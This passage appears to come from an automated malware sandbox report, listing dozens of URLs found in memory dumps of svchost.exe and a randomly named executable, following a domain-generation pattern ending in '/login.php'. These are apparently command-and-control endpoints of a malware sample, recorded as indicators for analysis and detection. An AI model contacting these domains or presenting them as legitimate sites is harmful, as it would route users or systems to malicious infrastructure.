Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1612298098.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqiw.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvob.com/
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvob.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvob.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvys.com/login.php
Source: svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzuw.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzyb.com/http://gaqyzyb.com/http://gaqyzyb.com/http://gacyqoz.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzyb.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycis.com/login.php
Source: svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycoh.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433310384.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431777445.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432903168.0000000000873000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657362701.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657376102.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1437941480.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433275152.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432955986.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycoh.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatydab.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539362714.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatynes.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/http://qedyhiq.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqeb.com/H
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587336760.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587864442.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyveh.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801191951.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzoz.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzyw.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfej.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfej.com/login.php
Source: svchost.exe, 00000002.00000003.1390048627.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390711474.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390491692.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1412887155.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1398889541.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390666834.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389397554.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390009708.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1848018737.00000000011A2000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
Source: svchost.exe, 00000002.00000003.1587051265.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1588374175.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygygux.com/http://pumypop.com/http://lyxywen.com/http://vojyjot.com/http://ganypis.com/http:
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjuj.com/http://gacypyz.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjuj.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylax.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000933F000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008382000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008403000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymoj.com/login.php
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433310384.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431777445.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1437941480.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433275152.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432955986.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynud.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynyr.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547049612.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1568716382.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549695990.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysen.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598016540.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysid.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.phpt
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywor.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608386340.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2143261512.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxux.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130977590.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfax.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/http://ganypih.com/http://qebytiq.com/http://qebytiq.com/http://pupybul.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.0000000008723000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 